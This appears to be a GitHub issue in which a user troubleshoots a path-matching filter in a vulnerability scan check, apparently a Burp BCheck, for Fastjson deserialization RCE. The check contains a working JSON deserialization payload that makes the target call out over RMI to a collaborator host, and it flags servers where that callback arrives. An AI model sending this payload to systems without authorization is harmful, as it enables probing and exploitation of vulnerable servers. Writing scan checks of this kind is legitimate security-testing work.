I encountered some problems with path matching. #259

@Awrrays

I encountered some problems with path matching.

```
metadata:
    language: v2-beta
    name: "Fastjson Deserialization RCE"
    description: "https://paper.seebug.org/1192/"
    author: "Javeley"
    tags: "Fastjson", "Deserialization", "RCE", "Alibaba"

define:
    oobAddress = {generate_collaborator_address()}

run for each:
    payload =
        [\{"@type": "java.lang.Exception","@type": "com.alibaba.fastjson.JSONException","x": \{"@type": "java.net.InetSocketAddress"\{"address":,"val": "rmi://{oobAddress}/{random_str(4)}"}}},\{"@type": "java.lang.Exception","@type": "com.alibaba.fastjson.JSONException","message": \{"@type": "java.net.InetSocketAddress"\{"address":,"val": "rmi://{oobAddress}/{random_str(4)}"}}}]

given path then
    if (not({base.request.url.path} matches ".*.(asp|aspx|ashx|asmx|php|js|css|png|jpg|jpeg|gif|ico|svg|woff|woff2|ttf|eot|pdf|doc|docx|xls|xlsx)")) and
        {base.request.body} matches "^[{]" and
        "application/json" in {base.request.headers} then
        send request:
            body: {payload}

        if dns interactions then
            report issue:
                severity: high
                confidence: certain
                detail: "https://paper.seebug.org/1192/."
                remediation: "https://paper.seebug.org/1192/."
        end if
    end if
```

After adding the filter condition `not({base.request.url.path} matches ".*.(asp|aspx|ashx|asmx|php|js|css|png|jpg|jpeg|gif|ico|svg|woff|woff2|ttf|eot|pdf|doc|docx|xls|xlsx)")`, running the test resulted in no requests.
